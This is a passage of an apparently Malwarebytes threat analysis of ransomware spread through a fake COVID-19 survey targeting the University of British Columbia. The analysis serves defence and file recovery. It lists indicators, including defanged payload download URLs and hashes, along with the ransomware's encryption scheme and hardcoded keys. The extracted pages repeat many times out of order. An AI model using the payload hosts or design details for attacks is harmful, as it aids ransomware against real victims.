bb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3381 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3382 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3383 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3384 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3385 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3386 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3387 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3388 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3389 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3390 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3391 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3392 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3393 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3394 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3395 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3396 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3397 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3398 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3399 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3400 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3401 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3402 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3403 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3404 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3405 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3406 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3407 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3408 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3409 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3410 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3411 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3412 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cdd